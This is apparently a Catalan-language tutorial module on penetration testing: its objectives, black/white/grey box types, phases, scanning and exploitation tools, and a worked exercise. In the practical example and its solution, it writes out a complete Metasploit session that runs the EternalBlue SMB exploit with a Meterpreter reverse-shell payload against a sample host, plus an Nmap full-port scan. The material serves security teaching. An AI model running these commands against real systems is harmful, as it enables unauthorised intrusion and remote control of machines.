Introducció

Les proves de penetració, també conegudes com a pentesting, són una part fonamental de la seguretat informàtica. Aquestes proves simulen atacs reals per identificar i explotar vulnerabilitats en sistemes, xarxes i aplicacions. L'objectiu és descobrir i corregir aquestes vulnerabilitats abans que puguin ser explotades per atacants malintencionats.

Objectius de les Proves de Penetració

  1. Identificar Vulnerabilitats: Detectar les debilitats en els sistemes que podrien ser explotades per atacants.
  2. Avaluar l'Impacte: Determinar l'impacte potencial de les vulnerabilitats descobertes.
  3. Provar Controls de Seguretat: Verificar l'eficàcia dels controls de seguretat existents.
  4. Millorar la Seguretat: Proporcionar recomanacions per millorar la seguretat dels sistemes.

Tipus de Proves de Penetració

  1. Proves de Caixa Negra (Black Box):

    • L'atacant no té informació prèvia sobre el sistema.
    • Simula un atacant extern sense accés privilegiat.
  2. Proves de Caixa Blanca (White Box):

    • L'atacant té accés complet a la informació del sistema.
    • Simula un atacant intern amb accés privilegiat.
  3. Proves de Caixa Grisa (Gray Box):

    • L'atacant té informació parcial sobre el sistema.
    • Simula un atacant amb algun nivell d'accés intern.

Fases de les Proves de Penetració

  1. Planificació i Reconeixement:

    • Definir l'abast i els objectius de la prova.
    • Recopilar informació sobre els sistemes objectiu (reconeixement passiu i actiu).
  2. Escaneig i Enumeració:

    • Utilitzar eines per escanejar els sistemes i identificar serveis, ports oberts i versions de programari.
    • Enumerar usuaris, recursos compartits i altres components del sistema.
  3. Explotació:

    • Intentar explotar les vulnerabilitats identificades per obtenir accés no autoritzat.
    • Utilitzar tècniques com l'injecció SQL, l'explotació de vulnerabilitats de programari, etc.
  4. Manteniment de l'Accés:

    • Intentar mantenir l'accés al sistema compromès per avaluar la persistència de l'atac.
    • Instal·lar backdoors o altres mecanismes per mantenir l'accés.
  5. Anàlisi i Informes:

    • Analitzar els resultats de la prova.
    • Elaborar un informe detallat amb les vulnerabilitats descobertes, l'impacte potencial i les recomanacions per a la seva correcció.

Eines de Proves de Penetració

Eines d'Escaneig i Enumeració

Eina Descripció
Nmap Escàner de xarxes per descobrir hosts i serveis en una xarxa.
Nessus Escàner de vulnerabilitats que identifica problemes de seguretat.
OpenVAS Plataforma d'escaneig de vulnerabilitats de codi obert.

Eines d'Explotació

Eina Descripció
Metasploit Marc d'explotació que proporciona eines per desenvolupar i executar exploits.
SQLmap Eina per automatitzar la detecció i explotació d'injeccions SQL.
Burp Suite Plataforma per provar la seguretat de les aplicacions web.

Exemple Pràctic: Utilitzant Metasploit

Pas 1: Iniciar Metasploit

msfconsole

Pas 2: Seleccionar un Exploit

use exploit/windows/smb/ms17_010_eternalblue

Pas 3: Configurar els Paràmetres

set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.101

Pas 4: Executar l'Exploit

exploit

Explicació del Codi

  • msfconsole: Inicia la consola de Metasploit.
  • use exploit/windows/smb/ms17_010_eternalblue: Selecciona l'exploit EternalBlue per a SMB.
  • set RHOSTS 192.168.1.100: Defineix l'objectiu de l'exploit.
  • set PAYLOAD windows/x64/meterpreter/reverse_tcp: Selecciona el payload que s'executarà a l'objectiu.
  • set LHOST 192.168.1.101: Defineix l'adreça IP de l'atacant per rebre la connexió inversa.
  • exploit: Executa l'exploit.

Exercici Pràctic

Objectiu

Realitzar una prova de penetració bàsica utilitzant Nmap i Metasploit per identificar i explotar una vulnerabilitat en un sistema objectiu.

Passos

  1. Escanejar la Xarxa amb Nmap:

    • Utilitza Nmap per escanejar la xarxa i identificar els serveis actius en un sistema objectiu.
    nmap -sS -p- 192.168.1.100
    
  2. Seleccionar un Exploit amb Metasploit:

    • Inicia Metasploit i selecciona un exploit adequat per a un dels serveis identificats.
  3. Configurar i Executar l'Exploit:

    • Configura els paràmetres necessaris i executa l'exploit per comprovar si pots obtenir accés al sistema objectiu.

Solució

  1. Escaneig amb Nmap:

    nmap -sS -p- 192.168.1.100
    

    Resultat esperat: Llistat de ports oberts i serveis actius.

  2. Seleccionar i Configurar l'Exploit:

    msfconsole
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOSTS 192.168.1.100
    set PAYLOAD windows/x64/meterpreter/reverse_tcp
    set LHOST 192.168.1.101
    
  3. Executar l'Exploit:

    exploit
    

    Resultat esperat: Obtenció d'una sessió de Meterpreter en el sistema objectiu.

Errors Comuns i Consells

  • Error: No es pot connectar a l'objectiu:

    • Verifica que l'adreça IP de l'objectiu és correcta i que el servei està actiu.
    • Assegura't que no hi ha firewalls bloquejant la connexió.
  • Error: Exploit falla:

    • Comprova que l'exploit seleccionat és adequat per a la versió del servei objectiu.
    • Revisa els paràmetres configurats i assegura't que són correctes.

Conclusió

Les proves de penetració són una eina essencial per avaluar la seguretat dels sistemes. Mitjançant la identificació i explotació de vulnerabilitats, els professionals de la seguretat poden millorar la protecció dels seus sistemes i prevenir atacs futurs. En aquest mòdul, hem explorat els objectius, tipus, fases i eines de les proves de penetració, així com un exemple pràctic per aplicar aquests conceptes.

© Copyright 2024. Tots els drets reservats